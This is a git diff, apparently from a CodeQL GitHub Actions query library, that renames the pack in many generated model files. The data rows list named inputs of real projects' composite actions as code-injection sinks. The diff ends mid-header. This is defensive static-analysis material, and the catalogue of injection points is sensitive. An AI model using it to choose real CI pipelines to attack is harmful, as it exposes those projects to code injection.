@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index de09b35f1d4..4a471b5a97c 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 91e6268e614..9f2448a6d75 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index 777212d9a0a..dc8a362dc96 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 8cc0ab83a42..a1f2ccb164e 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index f1244bdd5de..303f9d56cb2 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 37814510c8c..2f28cf86431 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index 48e40c36bea..efbcceb48f5 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 0edb2c5f8cd..649fac9fede 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index 61210d17abb..3623fe51e84 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index 22dc1a40629..d730cdb6a99 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index b2888b571a8..bcec913ef7c 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index bc188d91f1b..ad5ec2e544f 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index d5defe67401..9c5c38007bc 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index d97fedbed13..8899c0563e8 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index e22c29b09f1..f71c818a337 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 7203bb8345c..989eca71960 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index dcfbb0ea203..2666233ac87 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 6c5d6edd572..e8aa6be8fa6 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index fdaee61066e..9bd16741353 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index d68c4e57c8a..3c50e297eb5 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 85a8d2f4d65..d1c181a8707 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index d2275409278..5b600a4cad4 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index 4dc0b87214b..65fdcb11a00 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index ea1a8a8afec..08c3ff9cf43 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 5ce00c29e52..c06978549fb 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index d1f551b66da..eaca3fb9c62 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index 6f8845ec1c0..e1c608d3e10 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 152fdfed447..dc1f7a7b3b8 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 5919ade7e81..a80ce46abc5 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index d9afa5bb21f..15886c2c945 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 0b36853a891..45769a727d8 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 2bd521d42f5..9f85415a482 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index 8ae81e706a4..bbfb20551af 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index 4893772b71a..f8dc63ee029 100644 --- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index e174c830a85..5ad65dcc0bd 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 14070215bfa..90b6b38b6b0 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index f3a0b47f2c2..4f1157d862a 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index 12011d64396..b8ded477dd2 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 40ecb17610e..87ae2f5d614 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 250606588f9..0cfd7be68a3 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index f2f5678b8b8..54a05620d90 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index b17eb01f821..e16f3fc74b3 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index 7ebdde766f3..a3f692e7d2f 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 7f2e1588139..5acd7348464 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index eedeb384422..365dd90b120 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index fb6fb0267bb..0d7a06175a5 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index 60df7484e7f..4c831ca673a 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index d0af7b61f98..40b5f413d66 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 8d08848d24c..565bd119df7 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index f26f672a586..31157d853d0 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index 5431aad8dca..6208b63b89a 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 92c23f9f1fb..1073ddd49c1 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 52654194d81..2b71886a286 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index 43c274aa033..547bcca2ec9 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ 